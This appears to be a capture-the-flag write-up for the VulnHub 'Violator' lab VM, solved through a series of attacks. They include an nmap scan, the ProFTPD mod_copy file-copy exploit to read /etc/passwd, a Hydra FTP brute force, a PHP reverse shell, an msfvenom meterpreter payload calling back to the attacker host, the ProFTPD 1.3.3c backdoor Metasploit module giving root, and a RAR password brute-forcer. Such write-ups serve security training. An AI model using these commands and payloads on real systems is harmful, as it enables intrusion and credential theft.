As always, we start off with a quick nmap scan. This one turns up an FTP service and Apache web server.

root@mrb3n:/# nmap -sV 192.168.110.183

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-09-16 10:13 EDT
Nmap scan report for 192.168.110.183
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:7D:C7:3C (VMware)
Service Info: OS: Unix

The web server is pretty sparse. There is an image of Foghorn Leghorn  from Looney Tunes as well as a link to a Wikipedia page about the Depeche Mode album ‘Violator, which I can only assume is a hint for later.

root@mrb3n:~# curl -s http://192.168.110.183
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
  <body>
    <br>I Say.. I say... I say boy!  You're barkin up the wrong tree!</br>
    <img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
   <-- https://en.wikipedia.org/wiki/Violator_(album)  -->
  </body>
</html>

I pulled down the image and checked it with exiftool but did not find any hidden treasures.

Leaving the web server aside and taking a look at the FTP service banner, I find a ProFTPD 1.3.5 File Copy exploit over on exploit-db. Maybe I can use this to pull down something interesting?

I attempt to connect anonymously and get rejected so let’s try out this exploit.  If successful, I will be able to use the mod_copy module SITE CPFR/SITE CPTO commands to read/write files remotely and unauthenticated.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

I go after /etc/passwd first.

ftp> site CPFR /etc/passwd
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/passwd
250 Copy successful
ftp>

Awesome! The web root is writeable and I was able to grab down a list of usernames.

root@mrb3n:~# curl -s http://192.168.110.183/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/srv/ftp:/bin/false
mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash

So here we have a list of local usernames, which happen to be the members of Depeche Mode. I attempted to grab /etc/shadow but was denied. I grabbed the groups file to see what types of permissions each users have on the target system.

ftp> site CPFR /etc/group
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/group
250 Copy successful

root@mrb3n:~/violator# curl -s http://192.168.110.183/group > group
root@mrb3n:~/violator# cat group | grep sudo
sudo:x:27:dg

The user dg is in the sudoers group so hopefully we can get his creds somehow! At this point I figured I needed some sort of wordlist. The Wikipedia page in the index page source seems like a good candidate. Firing up Cewl I put together a quick wordlist.

root@mrb3n:~/violator# cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt

This wordlist didnt get me anywhere. After some fumbling around with various combinations I settled on a wordlist of with all of the song titles, lowercase, without spaces or special characters. First we remove all spaces.

root@mrb3n:~/violator# sed 's/ //g' violator > violator_nospaces

We can clean things up a bit more with cut and tr.

root@mrb3n:~/violator# cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > violator_list
root@mrb3n:~/violator# cat violator_list 
worldinmyeyes
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bluedress
clean
dangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin
enjoythesilence
enjoythesilence
enjoythesilence
sibeling
enjoythesilence
enjoythesilence
enjoythesilence
memphisto

Interesting enough Hydra finds valid passwords for all 4 users. Dg is my target so let’s check his account first.

root@mrb3n:~/violator# hydra -L users -P violator_list ftp://192.168.110.183
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-16 14:00:35
[DATA] max 16 tasks per 1 server, overall 64 tasks, 96 login tries (l:4/p:24), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.110.183   login: dg   password: policyoftruth
[21][ftp] host: 192.168.110.183   login: mg   password: bluedress
[21][ftp] host: 192.168.110.183   login: af   password: enjoythesilence
[21][ftp] host: 192.168.110.183   login: aw   password: sweetestperfection
1 of 1 target successfully completed, 4 valid passwords found

Logging in I am in dg’s home directory and am able to change to various other directories, including those for our other 3 users.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/dg" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x  10 root     root         4096 Jun  6 20:31 bd
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 af       af           4096 Jun 12 09:25 af
drwxr-xr-x   2 aw       aw           4096 Jun 12 09:25 aw
drwxr-xr-x   4 dg       dg           4096 Jun 14 18:55 dg
drwxr-xr-x   2 mg       mg           4096 Jun 12 09:28 mg

I pull down various files for inspection locally.

ftp> get minarke-1.21.tar.bz2
local: minarke-1.21.tar.bz2 remote: minarke-1.21.tar.bz2
200 PORT command successful
150 Opening BINARY mode data connection for minarke-1.21.tar.bz2 (15576 bytes)
226 Transfer complete
15576 bytes received in 0.01 secs (2.7953 MB/s)

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 aw       aw             59 Jun 12 09:19 hint
226 Transfer complete
ftp> get hint
local: hint remote: hint

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 mg       mg            112 Jun 12 09:28 faith_and_devotion
226 Transfer complete
ftp> get faith_and_devotion
local: faith_and_devotion remote: faith_and_devotion
200 PORT command successful
150 Opening BINARY mode data connection for faith_and_devotion (112 bytes)
226 Transfer complete

Dg’s home directory contains a more extensive directory listing which we’ll have to come back to later.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 bin
drwxr-xr-x   2 root     root         4096 Jun  6 20:46 etc
drwxr-xr-x   3 root     root         4096 Jun  6 20:31 include
drwxr-xr-x   4 root     root         4096 Jun  6 20:31 lib
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 libexec
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 sbin
drwxr-xr-x   4 root     root         4096 Jun  6 20:31 share
drwxr-xr-x   2 root     root         4096 Jun  6 22:17 var

Taking a look at our loot, the hint file is a bit vague…for now…

root@mrb3n:~/violator# cat hint
You are getting close... Can you crack the final enigma..?

The Minarke archive is interesting a C file and make file for compiling an Enigma M4 emulator. We know that knightmare is infamous for flag challenges so I am almost certain this will come into play later.

root@mrb3n:~/violator/minarke-1.21# cat minarke.c 
/* Minarke, an Enigma M4 emulator
 *
 * Written by John Gilbert
 * Version 1.21
 * (c) 2008

I compile it and check out the binary. Our suspicions are confirmed. this can be used to crack some Enigma code. Pretty awesome. Now lets find that code!

root@mrb3n:~/violator/minarke-1.21# make
gcc -g -Wall -o minarke minarke.c
root@mrb3n:~/violator/minarke-1.21# ./minarke 


Minarke, an Enigma M4 emulator
by John Gilbert

Emulates the Kriegsmarine M4 Enigma encryption machine

	Initial Setup Notes
Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them) 
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic 
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hit return to end input, 11 pairs recomended for maximum security.
Hit ESC at any time to quit.

	Special Keys (during input mode)
1: rewind one setting
2: reset position settings
3: new position settings
4: new setup
9: toggle debug
0: show position settings
?: show help

see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.html


Rotors: 

The faith_and_devotion file contains what we need to use the Enigma machine once we have the code.

root@mrb3n:~/violator# cat faith_and_devotion 
Lyrics:

* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D

Now I need a shell. Since /var/www/html appears to be writeable. I attempt to upload a PHP reverse shell. If all goes well and knightmare doesnt have any tricks up his sleeve I should be able to grab a nice reverse shell.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www/html
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg       dg          51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd  nogroup       699 Sep 16 17:39 group
-rw-rw-r--   1 dg       dg            318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd  nogroup      1330 Sep 16 15:24 passwd
226 Transfer complete
ftp> put /var/www/html/violator.php 
local: /var/www/html/violator.php remote: /var/www/html/violator.php
200 PORT command successful
150 Opening BINARY mode data connection for /var/www/html/violator.php
226 Transfer complete
3463 bytes sent in 0.00 secs (33.0257 MB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg       dg          51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd  nogroup       699 Sep 16 17:39 group
-rw-rw-r--   1 dg       dg            318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd  nogroup      1330 Sep 16 15:24 passwd
-rw-r--r--   1 dg       dg           3463 Sep 16 18:18 violator.php
226 Transfer complete

I browse to my violator.php reverse shell script and sure enough get a connection as www-data.

root@mrb3n:~/violator# curl -s http://192.168.110.183/violator.php

root@mrb3n:~# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.110.179] from (UNKNOWN) [192.168.110.183] 33641
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 19:20:09 up  3:00,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$ 

I su to the dg user and check what he is able to run as root, since I remembered from earlier that he is part of the sudoers group. Interesting, he can run another version of proftpd as root which what we saw earlier in his  home directory.

www-data@violator:/$ su dg
su dg
Password: policyoftruth

dg@violator:/$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
dg@violator:~/bd/sbin$ file proftpd
file proftpd
proftpd: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8abf34e54323fc0bb0320d1ea3750da2e57ecd08, stripped

dg@violator:~/bd/sbin$ sudo ./proftpd
sudo ./proftpd
 - setting default address to 127.0.0.1
localhost - SocketBindTight in effect, ignoring DefaultServer

We now have another service running locally on port 2121. How can this be abused to gain root privs?

dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -               
tcp        0    218 192.168.110.183:33641   192.168.110.179:443     ESTABLISHED 1391/bash       
tcp6       0      0 :::21                   :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 192.168.110.183:80      192.168.110.179:56414   ESTABLISHED -               
tcp6       0      0 192.168.110.183:21      192.168.110.179:56886   ESTABLISHED -

Connection to port 2121 locally I see we are dealing with ProFTPD 1.3.3c.

dg@violator:~/bd/sbin$ telnet 127.0.0.1 2121
telnet 127.0.0.1 2121
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]

This particular FTP client has a known backdoor command execution vulnerability which hopefully we can use to escalate privileges. There are many ways to do this, the way I did it worked but of course there are other options

root@mrb3n:~# searchsploit ProFTPD 1.3.3c
------------------------------------------------- ----------------------------------
 Exploit Title                                   |  Path
                                                 | (/usr/share/exploitdb/platforms)
------------------------------------------------- ----------------------------------
ProFTPD 1.3.3c - Compromised Source Remote Root  | ./linux/remote/15662.txt
ProFTPD-1.3.3c Backdoor Command Execution        | ./linux/remote/16921.rb

It looks like I will need Metasploit to take advantage of this exploit so I quickly create a meterpreter PHP payload and upload it to the target, execute and grab a meterpreter shell.

root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php
root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php

I could have used FTP to transfer the file, but after seeing that knightmare was kind enough to remove curl and wget I had to find another way.

Connection closed by foreign host.
dg@violator:~/bd/sbin$ wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php
< http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php      
The program 'wget' is currently not installed. You can install it by typing:
sudo apt-get install wget
dg@violator:~/bd/sbin$ curl -O http://192.168.110.179/violator_meterp.php
curl -O http://192.168.110.179/violator_meterp.php
The program 'curl' is currently not installed. You can install it by typing:
sudo apt-get install curl

SCP was still installed so I was able to transfer the file that way, as root which is super secure!

dg@violator:/var/www/html$ scp root@192.168.110.179:/var/www/html/violator_meterp.php .
<scp root@192.168.110.179:/var/www/html/violator_meterp.php .                
root@192.168.110.179's password: 🙂

violator_meterp.php                           100%   26KB  25.6KB/s   00:00 

Don’t forget to chown the file as dg so we can catch a session as this user.

dg@violator:/var/www/html$ chown dg:dg violator_meterp.php

Quickly set up metasploit to catch our shiny new meterpreter shell.

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set lhost 192.168.110.179
lhost => 192.168.110.179
msf exploit(handler) > set lport 8443
lport => 8443

Executing the shell I gain a connection and its time to set up some port forwarding so I can attack remote port 2121 directly.

dg@violator:/var/www/html$ phpviolator_meterp.php


msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.110.179:8443 
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.110.179:8443 -> 192.168.110.183:35213) at 2016-09-16 14:50:38 -0400

I use the built-in meterpreter portfwd command to set up the tcp relay.

meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121

Searching in metasploit I quickly find the exploit I’m looking for and configure it based on our port forwarding rule.

msf exploit(handler) > search ProFTPD

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution
msf exploit(proftpd_133c_backdoor) > use cmd/unix/reverse_perl
msf payload(reverse_perl) > show options 

Module options (payload/cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

msf payload(reverse_perl) > set LHOST 192.168.110.179
LHOST => 192.168.110.179
msf payload(reverse_perl) > exploit
[-] Unknown command: exploit.
msf payload(reverse_perl) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set LHOST 192.168.110.179
LHOST => 192.168.110.179

I run the exploit and pop a root shell.

msf exploit(proftpd_133c_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.110.179:4444 
[*] Sending Backdoor Command
[*] Command shell session 6 opened (192.168.110.179:4444 -> 192.168.110.183:44484) at 2016-09-16 15:59:57 -0400

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/#

Checking for our flag, as I expected, was a troll 🙂

root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?
---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.

The hidden directory ‘basildon’ in the root directory contains a file, crocs.rar.

root@violator:/root# ls -lah
ls -lah
total 24K
drwx------  3 root root 4.0K Jun 14 19:56 .
drwxr-xr-x 22 root root 4.0K Jun 14 19:44 ..
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
d--x------  2 root root 4.0K Jun 14 19:57 .basildon
-rw-r--r--  1 root root  114 Jun 12 10:22 flag.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@violator:/root# cd .basildon
cd .basildon
root@violator:/root/.basildon# ls -lah
ls -lah
total 148K
d--x------ 2 root root 4.0K Jun 14 19:57 .
drwx------ 3 root root 4.0K Jun 14 19:56 ..
-rw-r--r-- 1 root root 138K Jun 12 14:46 crocs.rar

I move the file over to the web root and pull it down locally for analysis.

root@mrb3n:~/violator# curl -O http://192.168.110.183/crocs.rar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  137k  100  137k    0     0  20.6M      0 --:--:-- --:--:-- --:--:-- 22.3M

root@mrb3n:~/violator# file crocs.rar 
crocs.rar: RAR archive data, v1d, os: Win32

root@mrb3n:~/violator# unrar e crocs.rar

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Extracting from crocs.rar

Enter password (will not be echoed) for artwork.jpg: 

Hmm, a password protected rar containing an image file. I was stuck here for a while. First I used Cewl to create a word list based on our original Wikipedia page but had no luck. I then ran the earlier song list without spaces that got us our user accounts and still no luck. Combining everything I had and using a quick rar brute force Python script I got a result.

#!/usr/bin/python

import rarfile
import subprocess

subprocess.call('clear', shell=True)
print "Rar file password brute forcer" + '\n'

rFile = rarfile.RarFile('crocs.rar')
PassFile = open('violator_songs')
for line in PassFile.readlines():
        password = line.strip('\n')
        try:
                rFile.extractall(pwd=password)
                print 'Correct Password = ' + password + '\n'
                exit(0)
        except Exception, e:
                pass

Our password, and the artwork.jpg file!

root@mrb3n:~/violator# python rarcracker.py 

Rar file password brute forcer

Correct Password = World in My Eyes

This time exiftool gave us something juicy, which I believe is our Engima code.

root@mrb3n:~/violator# wine /root/Desktop/exiftool.exe artwork.jpg 
ExifTool Version Number         : 10.07
File Name                       : artwork.jpg
Directory                       : .
File Size                       : 183 kB
File Modification Date/Time     : 2016:06:12 14:38:12-04:00
File Access Date/Time           : 2016:09:16 21:03:34-04:00
File Creation Date/Time         : 2016:06:12 14:38:12-04:00
File Permissions                : rw-rw-rw-
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Violator
Software                        : Google
Artist                          : Dave Gaham
Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version                    : 0220
Date/Time Original              : 1990:03:19 22:13:30
Create Date                     : 1990:03:19 22:13:30
Sub Sec Time Original           : 04
Sub Sec Time Digitized          : 04
Exif Image Width                : 1450
Exif Image Height               : 1450
XP Title                        : Violator
XP Author                       : Dave Gaham
XP Keywords                     : created by user dg
XP Subject                      : policyoftruth
Padding                         : (Binary data 1590 bytes, use -b option to extract)
About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator                         : Dave Gaham
Subject                         : created by user dg
Title                           : Violator
Description                     : Violator
Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired                   : 1941:05:09 10:30:18.134
Last Keyword XMP                : created by user dg
Image Width                     : 1450
Image Height                    : 1450
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1450x1450
Megapixels                      : 2.1
Create Date                     : 1990:03:19 22:13:30.04
Date/Time Original              : 1990:03:19 22:13:30.04

I was unable to get the Minarke program to work but the following decoder decoded the text for me. I just had to fix up the spacing to fully read the message.

ONE FINAL CHALLENGE FOR YOU BGHX 

CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR 
ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING  THE OBVIOUS ROUTE IN TO KEEP YOU ON YOUR TOES 
ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR 

SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN 

KNIGHTMARE

An update on knightmare’s Twitter here tells us that the final message should read BGH 393X. A little research leads us to this message board which tells us that this is the license plate for a 1981 Ford Corina MkV in the music video for the Depeche Mode song ‘Useless’.

i288483

Overall this one a fun VM with plenty of twists and turns. I learned some new techniques and about the band Depeche Mode. Thank you knightmare for the challenge and sharing a bit of culture with us.

As always, thank you to g0tmi1k and the vulnhub team for maintaining this great resource/community.

Until next time, enjoy the music!